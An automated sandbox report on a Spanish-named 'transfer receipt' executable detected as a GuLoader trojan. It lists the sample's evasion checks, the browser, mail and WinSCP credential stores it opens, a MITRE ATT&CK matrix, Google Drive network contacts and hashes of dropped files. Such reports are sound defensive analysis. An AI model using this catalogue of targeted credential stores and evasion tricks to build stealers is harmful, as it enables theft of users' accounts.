        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeMemory allocated: 34210000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeMemory allocated: 36210000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeAPI coverage: 2.3 %
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040580B
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_0040635D FindFirstFileW,FindClose,2_2_0040635D
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_0040580B
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_004027FB FindFirstFileW,2_2_004027FB
        Source: comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
        Source: comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeAPI call chain: ExitProcess graph end nodegraph_0-4548
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeAPI call chain: ExitProcess graph end nodegraph_0-4551
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_00405648 CreateDirectoryW,GetLastError,GetLastError,LdrInitializeThunk,SetFileSecurityW,GetLastError,0_2_00405648
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess created: C:\Users\user\Desktop\comprobante de transferencia.exe C:\Users\user\Desktop\comprobante de transferencia.exeJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeQueries volume information: C:\Users\user\Desktop\comprobante de transferencia.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Source: Yara matchFile source: 00000002.00000002.7701035769.0000000034211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: comprobante de transferencia.exe PID: 8496, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Masquerading
        1
        OS Credential Dumping
        111
        Security Software Discovery
        Remote Services1
        Email Collection
        21
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API
        Boot or Logon Initialization Scripts11
        Process Injection
        12
        Virtualization/Sandbox Evasion
        1
        Credentials in Registry
        12
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        1
        Disable or Modify Tools
        Security Account Manager2
        File and Directory Discovery
        SMB/Windows Admin Shares1
        Data from Local System
        2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Access Token Manipulation
        NTDS26
        System Information Discovery
        Distributed Component Object Model1
        Clipboard Data
        13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Process Injection
        LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Deobfuscate/Decode Files or Information
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
        Obfuscated Files or Information
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        comprobante de transferencia.exe100%AviraHEUR/AGEN.1361137
        comprobante de transferencia.exe63%ReversingLabsWin32.Trojan.GuLoader
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        http://www.quovadis.bm00%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        142.251.40.142
        truefalse
          high
          drive.usercontent.google.com
          142.251.41.1
          truefalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            https://www.google.comcomprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://www.quovadis.bm0comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903958987.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://drive.usercontent.google.com/comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://drive.google.com/Ar=comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A28000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://apis.google.comcomprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://nsis.sf.net/NSIS_ErrorErrorcomprobante de transferencia.exefalse
                      high
                      https://ocsp.quovadisoffshore.com0comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903958987.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://drive.google.com/comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A28000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        142.251.40.142
                        drive.google.comUnited States
                        15169GOOGLEUSfalse
                        142.251.41.1
                        drive.usercontent.google.comUnited States
                        15169GOOGLEUSfalse
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1411000
                        Start date and time:2024-03-18 15:04:15 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 15m 34s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                        Run name:Suspected Instruction Hammering
                        Number of analysed new started processes analysed:4
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:comprobante de transferencia.exe
                        Detection:MAL
                        Classification:mal80.troj.spyw.evad.winEXE@3/9@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 94%
                        • Number of executed functions: 73
                        • Number of non-executed functions: 73
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                        • Exclude process from analysis (whitelisted): dllhost.exe, UserOOBEBroker.exe
                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • VT rate limit hit for: comprobante de transferencia.exe
                        No simulations
                        No context
                        No context
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e19Grundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 142.251.40.142
                        • 142.251.41.1
                        Quote.exeGet hashmaliciousFormBookBrowse
                        • 142.251.40.142
                        • 142.251.41.1
                        PI.1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 142.251.40.142
                        • 142.251.41.1
                        QUOTE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 142.251.40.142
                        • 142.251.41.1
                        file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                        • 142.251.40.142
                        • 142.251.41.1
                        SSDAIG33Zh.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 142.251.40.142
                        • 142.251.41.1
                        Vindegade.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 142.251.40.142
                        • 142.251.41.1
                        reundertake.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 142.251.40.142
                        • 142.251.41.1
                        Request for quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 142.251.40.142
                        • 142.251.41.1
                        DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 142.251.40.142
                        • 142.251.41.1
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dllGrundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          cuenta para pago1.exeGet hashmaliciousGuLoaderBrowse
                            Grundforbedre39.exeGet hashmaliciousGuLoaderBrowse
                              venerationens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                venerationens.exeGet hashmaliciousGuLoaderBrowse
                                  Interviewed.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    Interviewed.exeGet hashmaliciousGuLoaderBrowse
                                      Arborean.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        Medarbejderstabens189.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          Process:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):11776
                                          Entropy (8bit):5.656126712214018
                                          Encrypted:false
                                          SSDEEP:192:em24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlESl:m8QIl975eXqlWBrz7YLOlE
                                          MD5:A4DD044BCD94E9B3370CCF095B31F896
                                          SHA1:17C78201323AB2095BC53184AA8267C9187D5173
                                          SHA-256:2E226715419A5882E2E14278940EE8EF0AA648A3EF7AF5B3DC252674111962BC
                                          SHA-512:87335A43B9CA13E1300C7C23E702E87C669E2BCF4F6065F0C684FC53165E9C1F091CC4D79A3ECA3910F0518D3B647120AC0BE1A68EAADE2E75EAA64ADFC92C5A
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: Grundforbedre39.exe, Detection: malicious, Browse
                                          • Filename: cuenta para pago1.exe, Detection: malicious, Browse
                                          • Filename: Grundforbedre39.exe, Detection: malicious, Browse
                                          • Filename: venerationens.exe, Detection: malicious, Browse
                                          • Filename: venerationens.exe, Detection: malicious, Browse
                                          • Filename: Interviewed.exe, Detection: malicious, Browse
                                          • Filename: Interviewed.exe, Detection: malicious, Browse
                                          • Filename: Arborean.exe, Detection: malicious, Browse
                                          • Filename: Medarbejderstabens189.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...zc.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):200432
                                          Entropy (8bit):3.234993383739913
                                          Encrypted:false
                                          SSDEEP:3072:MbK3xS/itsupP4zlLPatE1650lNzpANsqud:x2K16zJa2Qwd
                                          MD5:910B94BB45EC253A90F4CA8FA56BC584
                                          SHA1:ED29E140FE94207B697953B8D1466F7C02F4E60E
                                          SHA-256:BE72DFD9F250BBD69DCFD4508D08A327CBB9B3FBB11964FD5F66BEE35A9FD5C9
                                          SHA-512:93C902D3EC6959BBFA801D13A787A157A998B3615E69EFA205D0952FA6A9935AB699E62316A20F5DB0682DA340FAC8B8454272DDFE9C82D7C16CF57FBB6EE1A0
                                          Malicious:false
                                          Reputation:low
                                          Preview:j....................W.................w......Y............'.......e.......h.E.R.........................................w.O..............B.......e.............!...M..r..................i....o.......D.........".....$.....k....)........................V..................o..n.....w...............j.nO..........B..........a......K.......=....a............hA......0......w...........X......x.........$..u..G..........t.....X........|.....H.............................................x.....4...K....7...............j................!...3......F......l......T............U.......v.............~..ay..............G.T...v.q.Tl.'..T...cZ.........1.........,.......H...........P.............n.5...................y...V..[.................~..c..............O.v...V............a.......z=.....r.................{.....P.............+..........$............./.....#................/.....@.....5Q..2...../................H.......3............u|.........$.........................w.i......................c.......
                                          Process:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):274661
                                          Entropy (8bit):3.2513826448357057
                                          Encrypted:false
                                          SSDEEP:3072:VLYngh97JDNV3fLhV/OKJCY2kKIwk7Xf7NTVaYYvPclKkL:5Y6Dnj7JCkK/ovBT89cII
                                          MD5:9CB88B1AE7827818B29E20B15C82A937
                                          SHA1:A60DFA07CBF65C96A3C7019D99452F138A12746E
                                          SHA-256:445AA65354C5F1118FE748FE21ACFA11A69400398DD1CEAE2362242B187CF754
                                          SHA-512:2D0B4879369B2ADF0136AA2CDB1299614311A16D76F2A4FB90521E5D2EA17153874DA1F40C25A0CEBEDBE18DD31C2102AA0B6FAF295F1838FB3798CACA3EF1BE
                                          Malicious:false
                                          Reputation:low
                                          Preview:_..................................................J...T......4..N.......1................D...?...a.....j..................2................0.\.J...M...y....Ib..E...he...F..!...............$.M...........D.t...N....m...................j.......................g.z.....}.q.....,.........:....5................J.....]......=..............S......'.....M.:.........P....s...V..w...............|.......5.....D..............=."......8...l..............7..................'....j.....c..................."Z..E.f.......a.....S....|......w=...'t.[vP".........J...Y.........../.......K..........IlB......5........(...........E.b.....@.....................B...................qI.... ......}..>......k.;.Q........U..@e..............J,..qB...`h............:.......x.......3........................L..........2.B...............................P.....z...............=...e....&.....Z..............%.....~h......................................*........l.....G.................]...............H............Y........
                                          Process:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):59489
                                          Entropy (8bit):4.580505754362581
                                          Encrypted:false
                                          SSDEEP:768:XPXHwrXXLjLW9P0urM8Wq9AcrFvxMh18l6LYn+wKaxTT1cJ/X5iqmdKxRC:2LjLWr1WqN/M4mY+wKaBTQ/X5+KC
                                          MD5:9140973AC47B93AF67ACBA70D8840AD4
                                          SHA1:5431473058B0F1A06832A7C4AE8525C976620618
                                          SHA-256:7E665361FD0DB8138B3CF34029342C553CFCD80330F28CBC214423E672BB20F7
                                          SHA-512:F9D180A50699D5A0C517858B813627036C55E87154983A94CB173462C860A7DCA711C139B69074130316AD19EF7BFCE602153931401B74766C8BA8686356BFBE
                                          Malicious:false
                                          Reputation:low
                                          Preview:......~~.................!!....x...................Y...VV...........................'......#.....p.......x.555.EEE.......[.........z.E.RRR.......5.q.....T..SS.\.{................................,...u..$...........,..,..............nn..$....j.f.....n.X.M...................!........iiiii...................Q.......n..g....................................G...]............................!.........""""......nn.................|||.........''..............8.............o.11..........................l.{{...........;...2..........GGG...ll......Y.....000..........e..............xx.D..........OOOOOO..........III...}............;....'..........WWW..........zz..............""""...........x......NN..............qq......??..........................._.#...........^^.....H...............\\\\..........i...............jjj................XXXXX.fff.:........J..[.....\\.\\\................k......S.00......................b......T......].**...A....3....;..................................--...........R..6.uu.
                                          Process:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):183776
                                          Entropy (8bit):3.2465393215116713
                                          Encrypted:false
                                          SSDEEP:3072:0Y0pp0QgB1Uepc+D+FJOHDz9WWhEGwk/oZP:0Y0piQgB1Uepc+6Q5h7T/+
                                          MD5:B013C10185F365E645B1A8A4090DE5AF
                                          SHA1:20F0178AD225AEC8785EA741E82729E6D816CEF0
                                          SHA-256:0A403F11C29743BFFF4A5CBB13DA533121BC9CEC2F2BD38473F3939895422E4C
                                          SHA-512:B33FDB0357DA26C5E4A6BB45B50FDEAFE102E428F56D90A5EAC57829F5F57F8323C689A2BE928A468DB46948012078D10B605AE03F246EAA72827B1351807412
                                          Malicious:false
                                          Reputation:low
                                          Preview:...Y..[..-.........<..\.....IB......................}-.....................?.....a.......}..........,..........1...>..........9||...........&.....!.....T.................h....;....G............./N................G....................!..E...........:...0............=.......................,........l...'..............e...........Z..I..H...M..>...p..........j....S.].....................r..........v..........................l.......ad......q!.....b.4...(...............3............h..................^...........^...................b........................~.......^n.........e...................&.....................................H......6.................j....S..e........g..........H........5...........)...............,....8_..................7................Z.........o.n.......W....4...t.....|..........2.....o...............................y..%..n........hh....0....X...{...W..$...9..l..........*.............Ji..........I.........|...........F.....|......G.4....M.0Y.8...............
                                          Process:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):246330
                                          Entropy (8bit):7.79519904417669
                                          Encrypted:false
                                          SSDEEP:3072:5iozhsOrvBM0JN38MXONVHVLufMX6tNMBlZ2FNaCpRvpE9lh81Kf6iWPARBAEPMN:5tSwjRXYotKBl8FkKRC9lH6idLO6OaQ
                                          MD5:005464858B128A2A613D56386FA5297D
                                          SHA1:03CD9F513B21FADBD019F3F3AA2D2D2B9A14116E
                                          SHA-256:95E1306E687940A010BE1CD61F849601C2987399AA659DC86D5707BEA3BA76E1
                                          SHA-512:067208881D541BAF04C6B11F727891B2928CE34C4EDB3B219944DFF5F6C93A1640635E738364707724D5EBB7D7D6AFC9A9D4243A8176F3CAC5EB3E51BA9ACE08
                                          Malicious:false
